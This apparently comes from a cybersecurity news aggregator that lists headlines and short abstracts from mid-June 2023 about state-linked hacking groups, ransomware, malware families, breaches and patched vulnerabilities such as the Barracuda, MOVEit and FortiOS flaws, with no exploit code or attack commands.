The Ukrainian IT Army offers a unique perspective into the choices of an offensive actor in a war.Lawfare
June 15, 2023 – Government
Proposed NIST Updates and Data Incident Response Planning Full Text
Abstract
Proposals to update NIST 800-171—the U.S. government’s primary information security standard for the private sector—coincides with escalation of cyberattack against U.S. businesses.Lawfare
June 15, 2023 – Attack
Barracuda ESG zero-day exploited by China-linked APT Full Text
Abstract
Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day...Security Affairs
June 15, 2023 – Phishing
North Korea created evil twin of South Korea’s Naver.com Full Text
Abstract
North Korea has created a fake version of South Korea's largest internet portal, Naver, in a large-scale phishing attempt, Seoul's National Intelligence Service (NIS) said on Wednesday.Cyware
June 15, 2023 – APT
Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway Full Text
Abstract
A suspected China-nexus threat actor dubbed UNC4841 has been linked to the exploitation of a recently patched zero-day flaw in Barracuda Email Security Gateway (ESG) appliances since October 2022. "UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People's Republic of China," Google-owned Mandiant said in a new report published today, describing the group as "aggressive and skilled." The flaw in question is CVE-2023-2868 (CVSS score: 9.8), which relates to a remote code injection affecting versions 5.1.3.001 through 9.2.0.006 that arises as a result of an incomplete validation of attachments contained within incoming emails. Barracuda addressed the problem on May 20 and 21, 2023, but the company has since urged affected customers to immediately replace the devices "regardless of patch version level." Now according to the incident response and threat intelligence firm, which was appointed to probe the hack, UNC4The Hacker News
June 15, 2023 – APT
Russia-linked APT Gamaredon update TTPs in recent attacks against Ukraine Full Text
Abstract
Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine. The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa)...Security Affairs
June 15, 2023 – Vulnerabilities
Chrome 114 Update Patches Critical Vulnerability Full Text
Abstract
The new Chrome 114 update that resolves five vulnerabilities, including four critical- and high-severity bugs reported by external researchers. The most important of these is CVE-2023-3214, a critical use-after-free flaw in Autofill payments.Cyware
June 15, 2023 – Malware
Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities Full Text
Abstract
The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called Arkei and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts. Vidar has also been observed to be distributed via rogue Google Ads and a malware loader dubbed Bumblebee. Team Cymru, in a reportThe Hacker News
June 15, 2023 – Government
Cybersecurity agencies published a joint LockBit ransomware advisory Full Text
Abstract
The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020. According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted...Security Affairs
June 15, 2023 – Malware
Android Spyware GravityRAT Goes After WhatsApp Backups Full Text
Abstract
The BingeChat campaign is ongoing and the spyware can exfiltrate WhatsApp backups and receive commands to delete files. The actor behind GravityRAT remains unknown, and the group is tracked internally as SpaceCobra.Cyware
June 15, 2023 – Malware
Warning: GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files Full Text
Abstract
An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. "Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files," ESET researcher Lukáš Štefanko said in a new report published today. "The malicious apps also provide legitimate chat functionality based on the open-source OMEMO Instant Messenger app." GravityRAT is the name given to a cross-platform malware that's capable of targeting Windows, Android, and macOS devices. The Slovak cybersecurity firm is tracking the activity under the name SpaceCobra. The threat actor is suspected to be based in Pakistan, with recent attacks involving GravityRAT targeting military personnel in India and among the Pakistan Air Force by camouflaging it as cloud storage and entertainment apps, as disclosed by MetaThe Hacker News
June 15, 2023 – Government
Cyber Command reshuffles force expansion due to Navy readiness woes Full Text
Abstract
The U.S. military has rearranged a years-long effort to expand the "action arm" of its top cyber forces, according to multiple sources, as leaders try to balance fighting advanced foreign threats like China with maintaining basic readiness.Cyware
June 15, 2023 – General
New Research: 6% of Employees Paste Sensitive Data into GenAI tools as ChatGPT Full Text
Abstract
The revolutionary technology of GenAI tools, such as ChatGPT, has brought significant risks to organizations' sensitive data. But what do we really know about this risk? A new research by Browser Security company LayerX sheds light on the scope and nature of these risks. The report titled "Revealing the True GenAI Data Exposure Risk" provides crucial insights for data protection stakeholders and empowers them to take proactive measures. The Numbers Behind the ChatGPT Risk By analyzing the usage of ChatGPT and other generative AI apps among 10,000 employees, the report has identified key areas of concern. One alarming finding reveals that 6% of employees have pasted sensitive data into GenAI, with 4% engaging in this risky behavior on a weekly basis. This recurring action poses a severe threat of data exfiltration for organizations. The report addresses vital risk assessment questions, including the actual scope of GenAI usage across enterprise workforces, the relatiThe Hacker News
June 15, 2023 – Hacker
BreachForums Returns Under the Control of ShinyHunters Hackers Full Text
Abstract
The notorious hacking group ShinyHunters, who has been responsible for numerous massive data leaks in the past, has assumed control of the revived platform, raising alarm among cybersecurity experts and law enforcement agencies worldwide.Cyware
June 15, 2023 – Attack
New Supply Chain Attack Exploits Abandoned S3 Buckets to Distribute Malicious Binaries Full Text
Abstract
In what's a new kind of software supply chain attack aimed at open source projects, it has emerged that threat actors could seize control of expired Amazon S3 buckets to serve rogue binaries without altering the modules themselves. "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said. The attack was first observed in the case of an npm package called bignum , which, until version 0.13.0, relied on an Amazon S3 bucket to download pre-built binary versions of an addon named node-pre-gyp during installation. "These binaries were published on a now-expired S3 bucket which has since been claimed by a malicious third party which is now serving binaries containing malware that exfiltrates data from the user's computer," according to a GitHub advisory published on May 24, 2023. An unknown threat actorThe Hacker News
June 15, 2023 – General
E-Commerce Firms Are Top Targets for API, Web Apps Attacks Full Text
Abstract
Hackers hit the e-commerce industry with 14 billion attacks in 15 months, pushing it to the top of the list of targets for web application and API exploits, according to a new report by Akamai.Cyware
June 15, 2023 – Hacker
New Report Reveals Shuckworm’s Long-Running Intrusions on Ukrainian Organizations Full Text
Abstract
The Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments. Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec said in a new report shared with The Hacker News. "In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said. "The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more." Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to the Russia's FeThe Hacker News
June 15, 2023 – General
Small organizations outpace large enterprises in MFA adoption Full Text
Abstract
The use of MFA has nearly doubled since 2020 and that phishing-resistant authenticators represent the best choice in terms of security and convenience for users, according to Okta.Cyware
June 15, 2023 – Hacker
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent Full Text
Abstract
Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate ( GRU ) and has a "relatively low success rate." The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586 , has graduated it to a named actor dubbed Cadet Blizzard . "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company said . "While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard ." Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel wThe Hacker News
June 15, 2023 – Attack
Microsoft Links Data Wiping Attacks on Ukraine to New Russian Threat Actor Full Text
Abstract
The computing giant dubbed the threat actor Cadet Blizzard and said it's distinct from other well-known Russian military intelligence hacking groups, such as Sandworm and APT28, which is also known as Fancy Bear.Cyware
June 15, 2023 – Criminals
LockBit Ransomware Extorts $91 Million from U.S. Companies Full Text
Abstract
The threat actors behind the LockBit ransomware-as-a-service (RaaS) scheme have extorted $91 million following hundreds of attacks against numerous U.S. organizations since 2020. That's according to a joint bulletin published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies said . LockBit, which first burst onto the scene in late 2019, has continued to be disruptive and prolific, targeting as many as 76 victims in May 2023 alone, per statistics shared by Malwarebytes last week. The Russia-linked cartel has claimed responsibilThe Hacker News
June 14, 2023 – Vulnerabilities
ICS Patch Tuesday: Siemens Addresses Over 180 Third-Party Component Vulnerabilities Full Text
Abstract
Siemens has released a dozen new advisories covering roughly 200 vulnerabilities, with a majority of these flaws impacting third-party components. Schneider Electric has released four advisories covering five vulnerabilities.Cyware
June 14, 2023 – Hacker
Chinese Hackers Exploit VMware Zero-Day to Backdoor Windows and Linux Systems Full Text
Abstract
The Chinese state-sponsored group known as UNC3886 has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as CVE-2023-20867 (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs," Mandiant said . UNC3886 was initially documented by the Google-owned threat intelligence firm in September 2022 as a cyber espionage actor infecting VMware ESXi and vCenter servers with backdoors named VIRTUALPITA and VIRTUALPIE. Earlier this March, the group was linked to the exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system to deploy implants on the network appliances and interact with the aforementioned malware. The threat actor has been described as aThe Hacker News
June 14, 2023 – APT
Microsoft links Cadet Blizzard APT to Russia’s military intelligence GRU Full Text
Abstract
Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU. Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian...Security Affairs
June 14, 2023 – Malware
Deep dive into the Pikabot cyber threat Full Text
Abstract
Pikabot operates as a backdoor, enabling remote access to compromised systems, and receives commands from a C2 server. It uses anti-analysis techniques and deploys an injector to run tests before injecting its core module into a specified process.Cyware
June 14, 2023 – Vulnerabilities
Severe Vulnerabilities Reported in Microsoft Azure Bastion and Container Registry Full Text
Abstract
Two "dangerous" security vulnerabilities have been disclosed in Microsoft Azure Bastion and Azure Container Registry that could have been exploited to carry out cross-site scripting (XSS) attacks. "The vulnerabilities allowed unauthorized access to the victim's session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access, unauthorized modifications, and disruption of the Azure services iframes," Orca security researcher Lidor Ben Shitrit said in a report shared with The Hacker News. XSS attacks take place when threat actors inject arbitrary code into an otherwise trusted website, which then gets executed every time when unsuspecting users visit the site. The two flaws identified by Orca leverage a weakness in the postMessage iframe, which enables cross-origin communication between Window objects. This meant that the shortcoming could be abused to embed endpoints within remote servers usinThe Hacker News
June 14, 2023 – Vulnerabilities
Critical flaw found in WooCommerce Stripe Gateway Plugin used by +900K sites Full Text
Abstract
Hundreds of thousands of online stores are potentially exposed to hacking due to a critical vulnerability in the WooCommerce Stripe Payment Gateway plugin. The WooCommerce Stripe Payment Gateway plugin is affected by a critical vulnerability tracked...Security Affairs
June 14, 2023 – Malware
New PikaBot Trojan Executes Diverse Range of Commands Full Text
Abstract
Researchers have dissected a new modular malware trojan, dubbed Pikabot, that can execute a diverse range of malicious commands. The trojan self-terminates if the system’s language is Georgian, Kazakh, Uzbek, or Tajik. To stay safe, organizations must deploy the necessary detection tools to root o ... Read MoreCyware
June 14, 2023 – Malware
New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs Full Text
Abstract
A new Golang-based information stealer called Skuld has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto Fernández Provecho said in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information from the system and files stored in the victim's folders." Skuld, which shares overlaps with publicly available stealers like Creal Stealer , Luna Grabber , and BlackCap Grabber , is the handiwork of a developer who goes by the online alias Deathined on various social media platforms like GitHub, Twitter, Reddit, and Tumblr. Also spotted by Trellix is a Telegram group named deathinews, indicating that these online avenues could be used to promote the offering in the future as a service for other threat actors. The malware, upon execution, checks if it'sThe Hacker News
June 14, 2023 – Attack
Unveiling the Balada injector: a malware epidemic in WordPress Full Text
Abstract
Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress...Security Affairs
June 14, 2023 – Breach
Over 181,000 Patients’ Records at Pennsylvania Cardiology Group Breached Full Text
Abstract
The breach of the cardiology group first occurred on Feb 2 in data maintained by Commonwealth Health Physician Network-Cardiology, aka Great Valley Cardiology (GVC). The breach wasn't discovered until April 13, the system said in a news release.Cyware
June 14, 2023 – Education
Where from, Where to — The Evolution of Network Security Full Text
Abstract
For the better part of the 90s and early aughts, the sysadmin handbook said, " Filter your incoming traffic, not everyone is nice out there " (later coined by Gandalf as " You shall not pass "). So CIOs started to supercharge their network fences with every appliance they could get to protect against inbound (aka INGRESS) traffic. In the wake of the first mass phishing campaigns in the early 2010s, it became increasingly obvious that someone had to deal with the employees and, more and specifically, their stunning capacity to click on every link they'd receive. Outbound traffic filtering (aka EGRESS) became an obsession. Browser security, proxies, and other glorified antiviruses became the must-have every consulting firm would advise their clients to get their hands on ASAP. The risk was real, and the response was fairly adapted, but it also contributed to the famous " super soldier " stance. I'm alone against an army? So be it, I'll dig a tThe Hacker News
June 14, 2023 – APT
China-linked APT UNC3886 used VMware ESXi Zero-Day Full Text
Abstract
A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked...Security Affairs
June 14, 2023 – Disinformation
France accuses Russians of impersonating French government and media to spread disinformation Full Text
Abstract
The campaign impersonated four of France's most popular daily newspapers — 20 Minutes, Le Monde, Le Parisien, and Le Figaro — publishing “at least 58 articles” on the fake sites to push these false narratives, according to VIGINIUM.Cyware
June 14, 2023 – Malware
Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits Full Text
Abstract
At least half of dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service. All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, which discovered the activity, said , "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security." The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down. Besides sharing some of the purported findings on Twitter in an attemThe Hacker News
June 14, 2023 – Malware
LLM meets Malware: Starting the Era of Autonomous Threat Full Text
Abstract
Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats. Executive Summary In this report we shared some insight that emerged during our exploratory research,...Security Affairs
June 14, 2023 – Malware
BatCloak: Obfuscation Solution Outwitting 80% of AV Engines Full Text
Abstract
Trend Micro cautioned about the utilization of BatCloak, a tool designed to obfuscate batch files and evade antivirus detection engines with an 80% success rate. This ongoing research showcases the continuous evolution of the BatCloak engine, aiming to achieve compatibility with a wide range of mal ... Read MoreCyware
June 14, 2023 – Vulnerabilities
Critical Security Vulnerability Discovered in WooCommerce Stripe Gateway Plugin Full Text
Abstract
A security flaw has been uncovered in the WooCommerce Stripe Gateway WordPress plugin that could lead to the unauthorized disclosure of sensitive information. The flaw, tracked as CVE-2023-34000 , impacts versions 7.4.0 and below. It was addressed by the plugin maintainers in version 7.4.1, which shipped on May 30, 2023. WooCommerce Stripe Gateway allows e-commerce websites to directly accept various payment methods through Stripe's payment processing API. It boasts of over 900,000 active installations. According to Patch security researcher Rafie Muhammad, the plugin suffers from what's called an unauthenticated Insecure direct object references ( IDOR ) vulnerability, which allows a bad actor to bypass authorization and access resources. Specially, the problem stems from the insecure handling of order objects and a lack of adequate access control mechanism in the plugin's 'javascript_params' and 'payment_fields' functions of the plugin. "ThiThe Hacker News
June 14, 2023 – Business
Thales to Buy Tesserent for $119.1M to Aid Australian Growth Full Text
Abstract
A French conglomerate plans to purchase Australia's largest publicly traded cybersecurity company to expand its cyber service delivery capability in the high-growth Oceania market.Cyware
June 14, 2023a – Vulnerabilities
Microsoft Releases Updates to Patch Critical Flaws in Windows and Other Software Full Text
Abstract
Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023. Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderate, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser. It's worth noting that Microsoft also closed out 26 other flaws in Edge – all of them rooted in Chromium itself – since the release of May Patch Tuesday updates. This comprises CVE-2023-3079 , a zero-day bug that Google disclosed as being actively exploited in the wild last week. The June 2023 updates also mark the first time in several months that doesn't feature any zero-day flaw in Microsoft products that's publicly known or under active attack at the time of release. Topping the list of fixes is CVE-2023-29357 (CVSS score: 9.8), a privilege escalation flaw in SharePThe Hacker News
June 14, 2023 – Attack
New Research Shows Potential of Electromagnetic Fault Injection Attacks Against Drones Full Text
Abstract
New research shows the potential of electromagnetic fault injection (EMFI) attacks against unmanned aerial vehicles, with experts showing how drones that don’t have any known vulnerabilities could be hacked.Cyware
June 13, 2023 – Breach
Update: Xplain data breach also impacted the national Swiss railway FSS Full Text
Abstract
The Play ransomware attack suffered by the IT services provider Xplain is worse than initially estimated, the incident also impacted the national railway company of Switzerland (FSS) and the canton of Aargau.Cyware
June 13, 2023 – Malware
Beware: New DoubleFinger Loader Targets Cryptocurrency Wallets with Stealer Full Text
Abstract
A novel multi-stage loader called DoubleFinger has been observed delivering a cryptocurrency stealer dubbed GreetingGhoul in what's an advanced attack targeting users in Europe, the U.S., and Latin America. "DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger's loader stages," Kaspersky researcher Sergey Lozhkin said in a Monday report. The starting point of the attacks is a modified version of espexe.exe – which refers to Microsoft Windows Economical Service Provider application – that's engineered to execute shellcode responsible for retrieving a PNG image file from the image hosting service Imgur. The image employs steganographic trickery to conceal an encrypted payload that triggers a four-stage compromise chain which eventually culminates in the execution of the GreetingGhoul stealer on the infected host. A notable aspect of GreetingGhoThe Hacker News
June 13, 2023 – Vulnerabilities
Microsoft Patch Tuesday for June 2023 fixes 6 critical flaws Full Text
Abstract
Microsoft Patch Tuesday security updates for June 2023 fixed 69 flaws in its products, including six critical issues. Microsoft Patch Tuesday security updates for June 2023 fixed 69 vulnerabilities in multiple products, including Microsoft Windows...Security Affairs
June 13, 2023 – General
Lack of adequate investments hinders identity security efforts Full Text
Abstract
Organizations are still grappling with identity-related incidents, with an alarming 90% reporting one in the last 12 months, a 6% increase from last year, according to The Identity Defined Security Alliance (IDSA).Cyware
June 13, 2023 – General
Over Half of Security Leaders Lack Confidence in Protecting App Secrets, Study Reveals Full Text
Abstract
It might come as a surprise, but secrets management has become the elephant in the AppSec room. While security vulnerabilities like Common Vulnerabilities and Exposures (CVEs) often make headlines in the cybersecurity world, secrets management remains an overlooked issue that can have immediate and impactful consequences for corporate safety. A recent study by GitGuardian found that 75% of IT decision-makers in the US and the UK reported at least one secret leaked from an application, with 60% causing issues for the company or employees. Shockingly, less than half of respondents (48%) were confident in their ability to protect application secrets "to a great extent." The study, named Voice of Practitioners: The State of Secrets in AppSec (available for free download here ), provides a fresh perspective on managing secrets, which is often reduced to clichés that do not reflect the operational reality in engineering departments. Despite their ubiquity in modern cloud aThe Hacker News
June 13, 2023 – Outage
St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for its closure Full Text
Abstract
St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system. In February 2021a ransomware attack hit the St. Margaret’s Health in Illinois and forced the organization...Security Affairs
June 13, 2023 – Outage
Ransomware Attack Played Major Role in Shutdown of Illinois Hospital Full Text
Abstract
The attack occurred in February 2021 and forced the shutdown of the Spring Valley hospital’s computer network, impacting all web-based operations, including its patient portal. The Peru branch was not affected, as it operated on a separate system.Cyware
June 13, 2023 – Attack
Adversary-in-the-Middle Attack Campaign Hits Dozens of Global Organizations Full Text
Abstract
"Dozens" of organizations across the world have been targeted as part of a broad business email compromise ( BEC ) campaign that involved the use of adversary-in-the-middle ( AitM ) techniques to carry out the attacks. "Following a successful phishing attempt, the threat actor gained initial access to one of the victim employee's account and executed an 'adversary-in-the-middle' attack to bypass Office365 authentication and gain persistence access to that account," Sygnia researchers said in a report shared with The Hacker News. "Once gaining persistence, the threat actor exfiltrated data from the compromised account and used his access to spread the phishing attacks against other victim's employees along with several external targeted organizations." The findings come less than a week after Microsoft detailed a similar combination of an AitM phishing and a BEC attack aimed at banking and financial services organizations. BEC scamThe Hacker News
June 13, 2023 – Breach
A database containing data of +8.9 million Zacks users was leaked online Full Text
Abstract
A database containing the personal information of more than 8.9 million Zacks Investment Research users was leaked on a cybercrime forum. A database containing personal information of 8,929,503 Zacks Investment Research users emerged on a popular...Security Affairs
June 13, 2023 – Cryptocurrency
DoubleFinger Loader Delivers GreetingGhoul Stealer to Target Crypto Wallets Full Text
Abstract
Cybercriminals have added a new malware loader called DoubleFinger to their arsenal for stealing cryptocurrency and business information. GreetingGhoul comprises two major components that work together to steal cryptocurrency credentials. To protect themselves, organizations must look at the ... Read MoreCyware
June 13, 2023 – Education
Webinar - Mastering API Security: Understanding Your True Attack Surface Full Text
Abstract
Believe it or not, your attack surface is expanding faster than you realize. How? APIs, of course! More formally known as application programming interfaces, API calls are growing twice as fast as HTML traffic, making APIs an ideal candidate for new security solutions aimed at protecting customer data, according to Cloudflare. According to the "Quantifying the Cost of API Insecurity" report, US businesses incurred upwards of $23 billion in losses from API-related breaches in 2022. In fact, 76% of cybersecurity professionals admitted to experiencing an API-related security incident. This is why you can't afford to ignore your API security posture , especially when you consider that APIs don't exist in a vacuum. The infrastructure components powering those critical APIs can suffer from security misconfigurations as well, leaving you open to unexpected breaches. However, this isn't something you or your AppSec teams can take on alone, both in terms of volume andThe Hacker News
June 13, 2023 – Vulnerabilities
Fortinet urges to patch the critical RCE flaw CVE-2023-27997 in Fortigate firewalls Full Text
Abstract
Fortinet addressed a new critical flaw, tracked as CVE-2023-27997, in FortiOS and FortiProxy that is likely exploited in a limited number of attacks. Fortinet has finally published an official advisory about the critical vulnerability, tracked as CVE-2023-27997 (CVSS...Security Affairs
June 13, 2023 – Malware
SPECTRALVIPER Backdoor Focuses on Vietnamese Public Companies Full Text
Abstract
Vietnamese public companies have been targeted by the SPECTRALVIPER backdoor in an ongoing campaign. The backdoor, a previously undisclosed x64 variant, offers various capabilities including file manipulation, token impersonation, and PE loading. SPECTRALVIPER can be compiled as an executable o ... Read MoreCyware
June 13, 2023 – Criminals
Two Russian Nationals Charged for Masterminding Mt. Gox Crypto Exchange Hack Full Text
Abstract
The U.S. Department of Justice (DoJ) has charged two Russian nationals in connection with masterminding the 2014 digital heist of the now-defunct cryptocurrency exchange Mt. Gox. According to unsealed indictments released last week, Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, have been accused of conspiring to launder approximately 647,000 bitcoins stolen from September 2011 through at least May 2014 as a result of unauthorized access to a server holding crypto wallets used by Mt. Gox customers. "Starting in 2011, Bilyuchenko and Verner stole a massive amount of cryptocurrency from Mt. Gox, contributing to the exchange's ultimate insolvency," Assistant Attorney General Kenneth A. Polite, Jr. said in a statement. "Armed with the ill-gotten gains from Mt. Gox, Bilyuchenko allegedly went on to help set up the notorious BTC-e virtual currency exchange , which laundered funds for cyber criminals worldwide." Bilyuchenko and Verner are also alleged to havThe Hacker News
June 13, 2023 – Breach
UK communications regulator Ofcom hacked with a MOVEit file transfer zero-day Full Text
Abstract
UK communications regulator Ofcom suffered a data breach after a Clop ransomware attack exploiting the MOVEit file transfer zero-day. UK's communications regulator Ofcom disclosed a data breach after a Clop ransomware attack. The threat actors exploited...Security Affairs
June 13, 2023 – Vulnerabilities
Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw Full Text
Abstract
Security researchers from Horizon3 have released a proof-of-concept (PoC) exploit code for the CVE-2023-34362 flaw. The experts created the PoC exploit by performing reverse engineering of the patch released by the company.Cyware
June 13, 2023 – Phishing
New Phishing Scam Spoofs German Media, Broadband Conference Anga Full Text
Abstract
Hackers have devised an intricate phishing attack by leveraging the reputation of Germany’s renowned Anga Com conference to send spoofed emails and create deceptive web pages, deceiving unsuspecting users into divulging their login credentials.Cyware
June 13, 2023 – Vulnerabilities
Critical FortiOS and FortiProxy Vulnerability Likely Exploited - Patch Now! Full Text
Abstract
Fortinet on Monday disclosed that a newly patched critical flaw impacting FortiOS and FortiProxy may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors. The vulnerability , tracked as CVE-2023-27997 (CVSS score: 9.2), concerns a heap-based buffer overflow vulnerability in FortiOS and FortiProxy SSL-VPN that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. LEXFO security researchers Charles Fol and Dany Bach have been credited with discovering and reporting the flaw. It was addressed by Fortinet on June 9, 2023 in the following versions - FortiOS-6K7K version 7.0.12 or above FortiOS-6K7K version 6.4.13 or above FortiOS-6K7K version 6.2.15 or above FortiOS-6K7K version 6.0.17 or above FortiProxy version 7.2.4 or above FortiProxy version 7.0.10 or above FortiProxy version 2.0.13 or above FortiOS version 7.4.0 or above FortThe Hacker News
June 13, 2023 – Vulnerabilities
Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw Full Text
Abstract
Security firm Horizon3 released proof-of-concept (PoC) exploit code for the remote code execution (RCE) flaw CVE-2023-34362 in the MOVEit Transfer MFT. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files...Security Affairs
June 12, 2023 – General
Factors influencing IT security spending Full Text
Abstract
Security executives are overwhelmingly craving more AI solutions in 2023 to help them battle the growing cybersecurity threat landscape, according to a report by Netrix Global.Cyware
June 12, 2023 – Ransomware
New Entrants to Ransomware Unleash Frankenstein Malware Full Text
Abstract
In their haste to make money, some new players are picking over the discarded remnants of previous ransomware groups, cobbling together ransomware rather than going through the trouble of coding bespoke crypto-locking software.Cyware
June 12, 2023 – Vulnerabilities
Researchers Uncover Publisher Spoofing Bug in Microsoft Visual Studio Installer Full Text
Abstract
Security researchers have warned about an "easily exploitable" flaw in the Microsoft Visual Studio installer that could be abused by a malicious actor to impersonate a legitimate publisher and distribute malicious extensions. "A threat actor could impersonate a popular publisher and issue a malicious extension to compromise a targeted system," Varonis researcher Dolev Taler said . "Malicious extensions have been used to steal sensitive information, silently access and change code, or take full control of a system." The vulnerability, which is tracked as CVE-2023-28299 (CVSS score: 5.5), was addressed by Microsoft as part of its Patch Tuesday updates for April 2023, describing it as a spoofing flaw. The bug discovered by Varonis has to do with the Visual Studio user interface, which allows for spoofed publisher digital signatures. Specifically, it trivially bypasses a restriction that prevents users from entering information in the "productThe Hacker News
June 12, 2023 – Breach
Intellihartx data breach exposed the personal and health info of 490,000 individuals Full Text
Abstract
Intellihartx is notifying about 490,000 individuals that their personal information was compromised in the GoAnywhere zero-day attack in January. The Clop ransomware group has stolen stole personal and health information of 489,830 individuals as a result...Security Affairs
June 12, 2023 – Breach
San Francisco 49ers agree to pay out victims of 2022 data breach Full Text
Abstract
According to The Athletic, three class action lawsuits related to the breach were combined into one case. The plaintiffs filed settlement papers in California federal court, the site reported, which they described as an “unopposed motion.”Cyware
June 12, 2023 – General
Why Now? The Rise of Attack Surface Management Full Text
Abstract
The term " attack surface management " (ASM) went from unknown to ubiquitous in the cybersecurity space over the past few years. Gartner and Forrester have both highlighted the importance of ASM recently, multiple solution providers have emerged in the space, and investment and acquisition activity have seen an uptick. Many concepts come and go in cybersecurity, but attack surface management promises to have staying power. As it evolves into a critical component of threat and exposure management strategies, it's worth examining why attack surface management has grown to become a key category, and why it will continue to be a necessity for organizations worldwide. What is Attack Surface Management? Attack surfaces are rapidly expanding. The attack surface includes any IT asset connected to the internet – applications, IoT devices, Kubernetes clusters, cloud platforms – that threat actors could infiltrate and exploit to perpetuate an attack. A company's attack surface faThe Hacker News
June 12, 2023 – Malware
FUD Malware obfuscation engine BatCloak continues to evolve Full Text
Abstract
Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed the BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat...Security Affairs
June 12, 2023 – Botnet
IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia Reports Full Text
Abstract
